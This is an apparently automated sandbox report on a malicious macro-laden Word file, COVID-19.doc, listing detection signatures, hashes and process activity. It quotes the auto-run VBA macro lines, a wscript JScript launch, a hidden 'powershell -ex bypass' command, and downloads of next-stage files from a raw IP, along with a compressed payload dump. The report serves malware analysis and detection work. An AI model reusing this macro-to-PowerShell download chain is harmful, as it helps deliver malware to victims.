Analysis Report COVID-19.doc

Overview

General Information

Sample Name: COVID-19.doc
Analysis ID: 341993
MD5: 9f9f50f3c32ee660a8bbe6616dda8b34
SHA1: 6c338a10e894bcad8c67e5da332a6cd7f75f35e0
SHA256: 9d063fd60d7d0fb2d4d92f0f348bb2397cf80dd8a4fec5680647469b570f2afe

Most interesting Screenshot:

Detection

Score: 80
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

System process connects to network (likely due to code injection or exploit)
Document contains an embedded VBA macro which might access itself as a file (possible anti-VM)
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded macro with GUI obfuscation
Document exploit detected (process start blacklist hit)
Machine Learning detection for sample
Sigma detected: Microsoft Office Product Spawning Windows Shell
Suspicious javascript / visual basic script found (invalid extension)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains an embedded VBA which reads its own file name (might be used to evade sandboxes)
Document contains embedded VBA macros
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses a known web browser user agent for HTTP communication
Yara signature match

Classification

AV Detection:

barindex
Machine Learning detection for sample
Source: COVID-19.doc Joe Sandbox ML: detected

Compliance:

barindex
Uses new MSVCR Dlls
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Binary contains paths to debug symbols
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000004.00000002.2096344887.00000000027F0000.00000002.00000001.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior

Software Vulnerabilities:

barindex
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\wscript.exe Jump to behavior
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 78.141.194.181:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 78.141.194.181:80

Networking:

barindex
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AS-CHOOPAUS AS-CHOOPAUS
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /d569872345345.txt HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 78.141.194.181Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 78.141.194.181
Source: unknown TCP traffic detected without corresponding DNS query: 78.141.194.181
Source: unknown TCP traffic detected without corresponding DNS query: 78.141.194.181
Source: unknown TCP traffic detected without corresponding DNS query: 78.141.194.181
Source: unknown TCP traffic detected without corresponding DNS query: 78.141.194.181
Source: unknown TCP traffic detected without corresponding DNS query: 78.141.194.181
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 20 Jan 2021 09:25:07 GMTServer: Apache/2.4.25 (Debian)Last-Modified: Fri, 25 Dec 2020 16:29:47 GMTETag: "5a7-5b74c6eccbba7-gzip"Accept-Ranges: bytesVary: Accept-EncodingContent-Encoding: gzipContent-Length: 772Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/plainData Raw: 1f 8b 08 00 00 00 00 00 00 03 85 54 6d 6f d3 30 10 fe dc fc 8a 53 55 94 56 c8 d9 ba 96 31 8a f6 61 94 01 95 d8 5a 2d 88 7d 60 08 79 ce b5 31 24 76 b0 9d 6e 15 f4 bf 73 76 32 68 11 2f 91 92 d8 be b7 e7 9e bb 73 c5 0d 2f fb 1f 66 ca 8d 8e 3e f6 78 56 4a 75 25 57 b9 b3 70 0a 87 83 48 2e fb b0 77 ca f0 2b 1c c2 20 fa 16 75 7a dc ac bc 5a cc ce ef 51 d4 4e 6a b5 d0 85 14 1b 78 b1 a9 b8 25 dd 4b fd 56 af b4 ff 2b 0a 80 86 0b 27 d7 e8 f7 0b a3 97 b2 a0 e5 b5 54 99 be 4b dd 86 36 6f 64 96 a1 02 f6 ca 4b ba 31 3c 86 de c5 66 a6 d6 5a 70 ef 3c f9 b5 bc e4 25 92 38 ee 02 db 05 37 8c 09 95 a9 95 c2 8c 70 f5 96 bc b0 18 75 ee 72 f2 d7 07 a6 b4 83 07 e9 20 ea 50 06 9d 77 66 43 5f bf ea a4 8e 1b c7 08 97 40 0f dd 63 58 70 97 43 b7 d2 77 68 6c 8e 45 91 e0 3d 52 c4 33 b3 aa 4b 54 ee ad b4 e4 30 90 f0 c7 34 de a3 b9 85 ab 5a 9d 59 ef 7f 07 97 33 35 c1 ea 6c e9 9d 72 27 f2 16 02 ed b7 d1 16 22 24 d4 f0 2d 02 7a 7a f3 f4 cc 88 5c 3a 14 ae 36 48 c6 fd d7 e8 d8 75 29 e7 b7 9f e9 0c d8 b4 f0 4c 53 f8 d1 d1 a7 79 45 14 3b a9 56 e9 c6 3a 2c e1 3b a4 58 90 16 6b 95 e9 f9 cd 1f 3b 37 46 9b 33 e1 39 85 d4 e9 6a 90 ec 6b 04 14 72 09 fd df 91 b0 f3 af 10 1f 8f d9 ad 74 f1 a0 45 fb f0 f4 aa ca e6 ba f4 70 e3 e9 e4 a6 e1 c6 de 10 aa eb f9 f5 f1 f8 e1 60 e1 89 4d 3d b1 37 eb 61 72 18 07 1f 5b d8 49 ff ff 0e 29 cd d1 d1 bf 1d 46 0d 93 b5 29 c8 bc 9b 3b 57 4d 0e 0e 9e 9e 24 c3 f1 30 19 3e 1b 27 c3 93 e1 81 1d 8d 9f 9d 3c 1d 8f 9e d0 37 71 f7 ae db 1a 65 d6 85 66 3c 85 0f 4d b0 64 36 4f 7c 5b 7c 9c 4c a8 10 57 9c e2 96 5e c3 37 64 7f e0 5b 32 a9 ec b0 89 dc 5b 36 a6 3f d1 93 f4 26 74 75 eb b6 09 32 2b 2b 4d 9d 77 a1 b3 9a d4 5f 48 67 df 19 ae ec 12 4d 10 37 7d b9 7b 0c 2c d5 b5 11 d8 e4 c4 5e a2 a5 9a 87 b1 68 42 b6 d8 2d 9a b5 14 1e 00 c4 56 80 30 c8 1d 82 c8 51 7c a9 ab cc af 6f a5 aa 28 17 62 e5 d1 74 7e 91 2e ce a7 8f e0 60 0a d6 47 84 bd a3 80 7a 37 8d fd a1 80 bf de 00 81 bd 60 1d c8 08 23 1b fc 9f 42 86 05 df 60 c6 78 ed 34 bc 94 b6 a2 ad a7 91 e0 4c 3d 48 58 6a 03 0d 52 db 6d 19 15 a5 1f a0 2e fd 42 58 0f 56 78 47 b8 9f d9 f3 1d 85 07 1e 9e ef 1b 35 49 ee da b4 35 f7 97 cc 17 a4 84 2a 43 17 81 27 95 4d 75 59 52 a5 43 f8 06 47 65 f4 aa 6d 8c 9e 15 46 56 6e 52 ee de 54 17 9b d6 26 34 4b b0 b9 c2 52 af 91 cd fc 60 fe b2 67 af b4 af e4 fe 1c 92 40 b9 82 5c 28 2a 2c 5d 15 d1 36 fa 01 72 ee da 87 a7 05 00 00 Data Ascii: Tmo0SUV1aZ-}`y1$vnsv2h/s/f>xVJu%WpH.w+ uzZQNjx%KV+'TK6odK1<fZp<%87pur PwfC_@cXpCwhlE=R3KT04ZY35lr'"$-zz\:6Hu)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{17819F7E-DC64-4FB9-A805-BC7A4FB17A92}.tmp Jump to behavior
Source: global traffic HTTP traffic detected: GET /d569872345345.txt HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 78.141.194.181Connection: Keep-Alive
Source: wscript.exe, 00000002.00000003.2090930329.000000000042F000.00000004.00000001.sdmp String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
Source: wscript.exe, 00000002.00000003.2090930329.000000000042F000.00000004.00000001.sdmp String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: COVID-19.doc String found in binary or memory: http://78.141.194.181/d5698723
Source: wscript.exe, 00000002.00000002.2091442381.00000000003C2000.00000004.00000001.sdmp, wscript.exe, 00000002.00000002.2091401068.00000000002B4000.00000004.00000040.sdmp, wscript.exe, 00000002.00000003.2091005428.00000000003C2000.00000004.00000001.sdmp, COVID-19.doc, COVID-19.tmp.0.dr String found in binary or memory: http://78.141.194.181/d569872345345.txt
Source: COVID-19.doc String found in binary or memory: http://78.141.194.181/d569872345345.txt$$
Source: wscript.exe, 00000002.00000002.2094003578.0000000003FEB000.00000004.00000001.sdmp, d569872345345[1].txt.2.dr String found in binary or memory: http://78.141.194.181/s34987435987.txt
Source: wscript.exe, 00000002.00000002.2094477193.00000000058B0000.00000002.00000001.sdmp, powershell.exe, 00000004.00000002.2095768489.00000000022D0000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: wscript.exe, 00000002.00000002.2091568558.0000000001C80000.00000002.00000001.sdmp String found in binary or memory: http://servername/isapibackend.dll
Source: wscript.exe, 00000002.00000002.2094477193.00000000058B0000.00000002.00000001.sdmp, powershell.exe, 00000004.00000002.2095768489.00000000022D0000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: powershell.exe, 00000004.00000002.2095054638.00000000002D9000.00000004.00000020.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 00000004.00000002.2095015204.000000000028E000.00000004.00000020.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv

System Summary:

barindex
Document contains an embedded VBA macro which might access itself as a file (possible anti-VM)
Source: COVID-19.doc OLE, VBA macro line: f = ActiveDocument.Path + "\" + Replace(ActiveDocument.Name, ".doc", "")
Source: COVID-19.doc OLE, VBA macro line: f = ActiveDocument.Path + "\" + Replace(ActiveDocument.Name, ".doc", "")
Source: VBA code instrumentation OLE, VBA macro: Module ThisDocument, Function Document_Open Name: Document_Open
Source: VBA code instrumentation OLE, VBA macro: Module ThisDocument, Function Document_Open Name: Document_Open
Document contains an embedded VBA macro with suspicious strings
Source: COVID-19.doc OLE, VBA macro line: c = "wscript /e:jscript " + f
Source: VBA code instrumentation OLE, VBA macro: Module ThisDocument, Function Document_Open, String wscript: c = "wscript /e:jscript " + f Name: Document_Open
Document contains an embedded macro with GUI obfuscation
Source: COVID-19.doc Stream path 'Macros/UserForm1/o' : Found suspicious string wscript.shell in non macro stream
Source: COVID-19.doc Stream path 'Macros/UserForm1/o' : Found suspicious string activexobject in non macro stream
Source: COVID-19.doc Stream path 'Macros/UserForm1/o' : Found suspicious string scripting.filesystemobject in non macro stream
Suspicious javascript / visual basic script found (invalid extension)
Source: unknown Process created: C:\Windows\System32\wscript.exe wscript /e:jscript C:\Users\user\Desktop\COVID-19.tmp
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\wscript.exe wscript /e:jscript C:\Users\user\Desktop\COVID-19.tmp Jump to behavior
Wscript starts Powershell (via cmd or directly)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ex bypass -win hid -f C:\Users\user\Desktop\COVID-19.ps1 Jump to behavior
Document contains an embedded VBA macro which executes code when the document is opened / closed
Source: COVID-19.doc OLE, VBA macro line: Sub Document_Open()
Source: VBA code instrumentation OLE, VBA macro: Module ThisDocument, Function Document_Open Name: Document_Open
Document contains embedded VBA macros
Source: COVID-19.doc OLE indicator, VBA macros: true
Yara signature match
Source: 00000002.00000002.2091537255.000000000049A000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 00000002.00000003.2091136338.0000000004350000.00000004.00000040.sdmp, type: MEMORY Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\d569872345345[1].txt, type: DROPPED Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: classification engine Classification label: mal80.troj.expl.evad.winDOC@5/10@0/1
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$VID-19.doc Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVRC32F.tmp Jump to behavior
Source: COVID-19.doc OLE indicator, Word Document stream: true
Source: COVID-19.doc OLE document summary: title field not present or empty
Source: COVID-19.doc OLE document summary: author field not present or empty
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..................{...............................{.....................`I.........v.....................K..............<....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.................... ..v....................................}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\System32\wscript.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\wscript.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown Process created: C:\Windows\System32\wscript.exe wscript /e:jscript C:\Users\user\Desktop\COVID-19.tmp
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ex bypass -win hid -f C:\Users\user\Desktop\COVID-19.ps1
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\wscript.exe wscript /e:jscript C:\Users\user\Desktop\COVID-19.tmp Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ex bypass -win hid -f C:\Users\user\Desktop\COVID-19.ps1 Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F414C260-6AC0-11CF-B6D1-00AA00BBBB58}\InprocServer32 Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Window found: window name: SysTabControl32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000004.00000002.2096344887.00000000027F0000.00000002.00000001.sdmp
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
